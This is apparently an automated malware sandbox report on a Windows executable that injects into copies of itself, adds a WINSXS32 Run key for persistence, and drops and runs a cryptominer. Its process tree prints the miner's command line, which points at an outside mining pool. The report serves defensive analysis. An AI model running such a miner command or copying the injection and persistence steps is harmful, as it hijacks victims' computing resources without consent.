1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
12/10/2023, 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
Size

459KB
MD5

062ec9a8e7a9a0270d62f53a823518c0
SHA1

d933e3170faf6bf57013dfb71458a85c2ef0b609
SHA256

1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33
SHA512

16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395
SSDEEP

6144:n/n74zAQ3ZUdYF/GcxwJoQwni8DdpzxscQgYd8bNwUDxfkffsT/Wb9wR/AL+qf23:/74n3edYfiCwUOf0T/2O/Ax2CrU

Score

7^/10

persistence

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000b000000012021-2.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
2532	minerd.exe

Loads dropped DLL 5 IoCs

pid	Process
2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
2532	minerd.exe
2532	minerd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\WINSXS32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2020 set thread context of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2056 set thread context of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 set thread context of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 set thread context of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2612	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2020 wrote to memory of 2056	2020	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	28
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2612	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	29
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2604	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	30
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31
PID 2056 wrote to memory of 2532	2056	NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe	31

C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2612
- - C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.062ec9a8e7a9a0270d62f53a823518c0_JC.exe
    3⤵
    - Adds Run key to start application
    PID:2604
- - C:\Users\Admin\AppData\Local\Temp\minerd.exe
    minerd.exe -a scrypt -s 20 -q -o zz.o247r.com:443 -u anonymous.1 -p -x
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
295KB

MD5
6aa2534bce88c87f81344c37c857f863

SHA1
5f3b3b559e1e2ae1a3947537e30c266134017f98

SHA256
4c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a

SHA512
a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\minerd.exe

Filesize
459KB

MD5
062ec9a8e7a9a0270d62f53a823518c0

SHA1
d933e3170faf6bf57013dfb71458a85c2ef0b609

SHA256
1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33

SHA512
16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395

Download Submit
C:\Users\Admin\AppData\Local\Temp\minerd.exe

Filesize
459KB

MD5
062ec9a8e7a9a0270d62f53a823518c0

SHA1
d933e3170faf6bf57013dfb71458a85c2ef0b609

SHA256
1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33

SHA512
16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395

Download Submit
C:\Users\Admin\AppData\Local\Temp\pthreadGC2.dll

Filesize
70KB

MD5
492153d3b3f0fb99abd48752c8d2e796

SHA1
dae87bee3d82a812cf321d933945647c4a63d854

SHA256
3866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5

SHA512
3e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
295KB

MD5
6aa2534bce88c87f81344c37c857f863

SHA1
5f3b3b559e1e2ae1a3947537e30c266134017f98

SHA256
4c1a15de636720aece3b967ce599468eae8a67a2d3cb9e00aa308f2b9f10e74a

SHA512
a7950f05cbe3a3163d1f383395e2c41c42321042df29b141c1243c31e47118362e0aea8a81ccc0f56ae14a0914f246e10ced9be193ca9f65bc90d12f9b86c33a

Download Submit
\Users\Admin\AppData\Local\Temp\minerd.exe

Filesize
459KB

MD5
062ec9a8e7a9a0270d62f53a823518c0

SHA1
d933e3170faf6bf57013dfb71458a85c2ef0b609

SHA256
1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33

SHA512
16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395

Download Submit
\Users\Admin\AppData\Local\Temp\minerd.exe

Filesize
459KB

MD5
062ec9a8e7a9a0270d62f53a823518c0

SHA1
d933e3170faf6bf57013dfb71458a85c2ef0b609

SHA256
1f5930c1b14930476c137e4147caba9653e666a5e8a5d428b81d4c0a9373ff33

SHA512
16a6c1f69beed1104511841ad7fda0bd5ec0edbf52f0b505e071ca3e5900b24c73395e44723642530c10546492032af0596c79c389b62f5f92a525905b897395

Download Submit
\Users\Admin\AppData\Local\Temp\pthreadGC2.dll

Filesize
70KB

MD5
492153d3b3f0fb99abd48752c8d2e796

SHA1
dae87bee3d82a812cf321d933945647c4a63d854

SHA256
3866bdf85958e47ab3110884035a74469fabe2495cf3cc64194d390211e312f5

SHA512
3e4ee410bef252ae25a9c1065af196a41979c612478a5897c009ca25d23e9d45b091ca7787f43946aceed537a97299e97519c8bba3e79ab84205eb196c46d515

Download Submit
\Users\Admin\AppData\Local\Temp\wml7EE0.tmp

Filesize
172KB

MD5
685f1cbd4af30a1d0c25f252d399a666

SHA1
6a1b978f5e6150b88c8634146f1406ed97d2f134

SHA256
0e478c95a7a07570a69e6061e7c1da9001bccad9cc454f2ed4da58824a13e0f4

SHA512
6555ad6b4f4f26105ca8aad64501d74519a3e091f559b4b563d6ffb20a2ddfcde65e4fe94971a9bc65e86db577f2548ca00f9920d341c8ea808b04c0947d61d9

Download Submit
memory/2020-0-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/2020-4-0x00000000002D0000-0x0000000000343000-memory.dmp

Filesize
460KB

Download
memory/2020-14-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/2020-17-0x00000000002D0000-0x0000000000343000-memory.dmp

Filesize
460KB

Download
memory/2056-15-0x000000000048F000-0x00000000004CF000-memory.dmp

Filesize
256KB

Download
memory/2056-38-0x0000000000400000-0x00000000004CEA95-memory.dmp

Filesize
826KB

Download
memory/2056-19-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-22-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-90-0x00000000001B0000-0x00000000001FC000-memory.dmp

Filesize
304KB

Download
memory/2056-89-0x00000000001B0000-0x00000000001FC000-memory.dmp

Filesize
304KB

Download
memory/2056-88-0x0000000000400000-0x00000000004CEA95-memory.dmp

Filesize
826KB

Download
memory/2056-20-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-16-0x0000000000400000-0x00000000004CEA95-memory.dmp

Filesize
826KB

Download
memory/2056-21-0x0000000000400000-0x00000000004CEA95-memory.dmp

Filesize
826KB

Download
memory/2056-39-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-18-0x000000000048F000-0x00000000004CF000-memory.dmp

Filesize
256KB

Download
memory/2056-13-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2056-9-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-66-0x00000000001B0000-0x00000000001FC000-memory.dmp

Filesize
304KB

Download
memory/2056-64-0x00000000001B0000-0x00000000001FC000-memory.dmp

Filesize
304KB

Download
memory/2056-7-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2056-5-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/2532-71-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-75-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-59-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-63-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-67-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-92-0x0000000070800000-0x000000007084F000-memory.dmp

Filesize
316KB

Download
memory/2532-69-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-91-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-73-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-87-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-79-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2532-86-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2604-43-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2604-41-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2604-62-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2604-45-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2604-47-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2604-60-0x0000000000400000-0x0000000000404000-memory.dmp

Filesize
16KB

Download
memory/2612-36-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/2612-34-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/2612-30-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/2612-28-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/2612-26-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download